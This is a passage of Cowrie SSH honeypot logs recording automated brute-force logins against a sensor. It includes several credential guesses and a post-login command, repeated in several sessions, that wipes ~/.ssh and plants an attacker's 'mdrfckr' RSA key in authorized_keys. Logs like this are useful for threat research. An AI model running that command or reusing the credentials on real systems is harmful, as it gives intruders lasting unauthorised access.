mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:33:57.427653Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:33:58.009894Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:58.011005Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42392,"dst_ip":"1.2.3.4","dst_port":22,"session":"4297bda7b563","protocol":"ssh","message":"New connection: 212.227.235.229:42392 (1.2.3.4:22) [session: 4297bda7b563]","sensor":"my-vps","timestamp":"2025-09-08T12:33:58.186094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:33:58.188982Z","src_ip":"212.227.235.229","session":"4297bda7b563"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:33:58.488905Z","src_ip":"212.227.235.229","session":"4297bda7b563"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:33:59.695010Z","src_ip":"212.227.235.229","session":"4297bda7b563"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:01.000409Z","src_ip":"212.227.235.229","session":"4297bda7b563"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42406,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c1ad3d05551","protocol":"ssh","message":"New connection: 212.227.235.229:42406 (1.2.3.4:22) [session: 5c1ad3d05551]","sensor":"my-vps","timestamp":"2025-09-08T12:34:01.302497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:34:01.305651Z","src_ip":"212.227.235.229","session":"5c1ad3d05551"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:34:01.608790Z","src_ip":"212.227.235.229","session":"5c1ad3d05551"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:34:02.821822Z","src_ip":"212.227.235.229","session":"5c1ad3d05551"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:03.136124Z","src_ip":"212.227.235.229","session":"5c1ad3d05551"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:03.335674Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54434,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1e6a636dfff","protocol":"ssh","message":"New connection: 212.227.235.229:54434 (1.2.3.4:22) [session: b1e6a636dfff]","sensor":"my-vps","timestamp":"2025-09-08T12:34:05.943199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:34:05.943872Z","src_ip":"212.227.235.229","session":"b1e6a636dfff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:34:06.204514Z","src_ip":"212.227.235.229","session":"b1e6a636dfff"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"qwerty","message":"login attempt [sshd/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T12:34:07.287956Z","src_ip":"212.227.235.229","session":"b1e6a636dfff"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:08.551233Z","src_ip":"212.227.235.229","session":"b1e6a636dfff"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57672,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ea86899e916","protocol":"ssh","message":"New connection: 217.72.205.35:57672 (1.2.3.4:22) [session: 9ea86899e916]","sensor":"my-vps","timestamp":"2025-09-08T12:34:24.558906Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:24.560139Z","src_ip":"217.72.205.35","session":"9ea86899e916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38652,"dst_ip":"1.2.3.4","dst_port":22,"session":"905f871f48b3","protocol":"ssh","message":"New connection: 212.227.235.229:38652 (1.2.3.4:22) [session: 905f871f48b3]","sensor":"my-vps","timestamp":"2025-09-08T12:34:48.644129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:34:48.645330Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:34:48.907073Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.login.success","username":"root","password":"asterisk","message":"login attempt [root/asterisk] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:34:49.957144Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:34:50.535360Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:34:50.536031Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:34:50.536992Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:50.804758Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:34:51.347903Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.348736Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.613502Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.614693Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.870743Z","src_ip":"212.227.235.229","session":"905f871f48b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39242,"dst_ip":"1.2.3.4","dst_port":22,"session":"66c676ed9cbd","protocol":"ssh","message":"New connection: 212.227.235.229:39242 (1.2.3.4:22) [session: 66c676ed9cbd]","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.898396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:34:51.899335Z","src_ip":"212.227.235.229","session":"66c676ed9cbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:34:52.165282Z","src_ip":"212.227.235.229","session":"66c676ed9cbd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:34:53.295029Z","src_ip":"212.227.235.229","session":"66c676ed9cbd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:54.566980Z","src_ip":"212.227.235.229","session":"66c676ed9cbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39244,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bff9d7041ed","protocol":"ssh","message":"New connection: 212.227.235.229:39244 (1.2.3.4:22) [session: 6bff9d7041ed]","sensor":"my-vps","timestamp":"2025-09-08T12:34:54.818758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:34:54.827664Z","src_ip":"212.227.235.229","session":"6bff9d7041ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:34:55.092694Z","src_ip":"212.227.235.229","session":"6bff9d7041ed"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:34:55.829006Z","src_ip":"212.227.235.229","session":"6bff9d7041ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33324,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9fd033ca48f","protocol":"ssh","message":"New connection: 212.227.235.229:33324 (1.2.3.4:22) [session: d9fd033ca48f]","sensor":"my-vps","timestamp":"2025-09-08T12:35:12.072295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:35:12.074056Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:35:12.254592Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.login.success","username":"root","password":"rooted","message":"login attempt [root/rooted] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:35:13.017095Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:35:13.435505Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:35:13.436547Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:35:13.437712Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:13.620201Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:35:14.008339Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.009349Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
